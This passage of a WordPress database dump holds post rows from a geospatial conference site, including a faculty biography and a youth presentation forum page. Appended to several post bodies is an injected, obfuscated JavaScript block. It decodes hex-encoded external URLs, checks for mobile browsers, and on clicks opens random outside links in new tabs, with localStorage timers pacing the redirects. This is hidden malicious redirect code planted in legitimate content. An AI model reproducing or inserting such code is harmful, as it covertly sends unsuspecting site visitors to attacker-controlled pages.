_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','International Science Committee','','inherit','closed','closed','','2876-revision-v1','','','2023-01-22 03:34:02','2023-01-22 03:34:02','',2876,'https://gsw2023.com/?p=3609',0,'revision','',0),
(3610,1,'2023-01-22 04:00:52','2023-01-22 04:00:52','<!-- wp:cover {\"overlayColor\":\"accent\"} -->\n<div class=\"wp-block-cover\"><span aria-hidden=\"true\" class=\"wp-block-cover__background has-accent-background-color has-background-dim-100 has-background-dim\"></span><div class=\"wp-block-cover__inner-container\"><!-- wp:paragraph -->\n<p>Mohamed Gomaa Mohamed is an assistant professor at the Faculty of Engineering, Cairo University with 19 years of professional and academic experience in the field of Geomatics and Transportation Engineering. He got his doctorate degree (Ph.D.) in Civil Engineering from Ecole Polytechnique de Montreal (Engineering School affiliated with the University of Montreal).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Mohamed’s research focuses on photogrammetry and remote sensing topics, in particular, computer vision technique, structure from motion, video data analysis, safety analysis, driver behavior analysis, Deep learning techniques, shoreline detection and Early Hazard Warning of Coastal Sea Level Rise.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Mohamed published around 15 conference and journal papers. He supervised and graduated Master and PhD students. He is a reviewer in several journal such as Transportation Research Board (TRB) (Committee on Safety Data, Analysis, and Evaluation (ANB20) and Pedestrian committee (ANF10)) ,Journal of Traffic Injury Prevention , Journal of Advanced Transportation and IEEE Intelligent Transportation Systems Magazine.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Mohamed is a member of Egyptian Engineer Syndicate, American Society of Civil Engineers (ASCE) , Interdisciplinary Research Group on Mobility, Environment and Safety (GRIMES), and the Interuniversity Research Centre on Enterprise Networks, Logistics and Transportation (CIRRELT),</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:cover -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Assistant Prof. Mohamed Gomaa Mohamed','','publish','closed','closed','','assistant-prof-mohamed-gomaa-mohamed','','','2023-01-22 04:00:57','2023-01-22 04:00:57','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3610',0,'dt_team','',0),
(3611,1,'2023-01-22 03:53:31','2023-01-22 03:53:31','','loc14','','inherit','open','closed','','loc14','','','2023-01-22 03:53:31','2023-01-22 03:53:31','',3610,'https://gsw2023.com/wp-content/uploads/2023/01/loc14.jpg',0,'attachment','image/jpeg',0),
(3612,1,'2023-01-22 03:58:05','2023-01-22 03:58:05','','loc14','','inherit','open','closed','','loc14-2','','','2023-01-22 03:58:05','2023-01-22 03:58:05','',3610,'https://gsw2023.com/wp-content/uploads/2023/01/loc14-1.jpg',0,'attachment','image/jpeg',0),
(3613,1,'2023-01-22 04:30:18','2023-01-22 04:30:18','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3618\" img_size=\"600x400\"][vc_single_image image=\"3620\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">Youth Presentation Forum</span></strong></h5>\r\n&nbsp;\r\n<h5 style=\"text-align: justify;\">The ISPRS Student Consortium (ISPRS SC) is the official representation of the students and the youth to ISPRS. One of its aims is to provide a platform for the exchange of information and to organize student-specific events and other activities that integrate students and the youth more effectively into ISPRS activities.\r\nISPRS SC organizes a forum where students and young researchers attending the Geospatial Week 2023 can give a presentation about their research. We particularly encourage local and regional students to participate and provide the attendees with an overview of the geospatial and/or remote sensing research undertaken in Egypt and other African Regions, although presentations throughout the globe are welcomed.\r\nThe objective of this forum is to provide a platform for communication, networking and exchange of research ideas among students and young professionals while promoting ISPRS SC and its activities. Moreover, as one of the ISPRS SC targets of 2023 is to expand our sphere of influence in Africa through Student Chapters and collaborations, this event will be an opportunity for us to connect with people and organizations that might become our next African partners.\r\nImportantly, the best paper nominated from this forum will be eligible to compete for the ISPRS Student Consortium Excellence Award.</h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: center;\">Forum Organizers</h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"68\"][vc_separator color=\"peacoc\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5><strong>Themes of the event:</strong></h5>\r\nWe welcome papers from students and young researchers submitting their research in all the areas using RS, GIS and Photogrammetry technologies in addition to the following themes:\r\n⦁ GIS and Remote Sensing (RS) For a Sustainable Future.\r\n⦁ Applications of Machine Learning in Geospatial Technologies.\r\n⦁ Use of Open Source Tools/Technologies in GIS and Remote Sensing.\r\n⦁ Crowdsourcing and Citizen Science in Geospatial Sector.\r\n⦁ GIS Education and Outreach Activities.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h5><strong>Featuring Forum Report in ISPRS SC Newsletter:</strong></h5>\r\nWe accept both the abstracts and full papers that have been submitted by following ISPRS guidelines. After the forum, authors of the selected papers will be invited to submit an article detailing their research to the “Spectrum” (ISPRS SC Newsletter), in its Spotlight section. We will also feature the summary of this event in the Spectrum.[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const 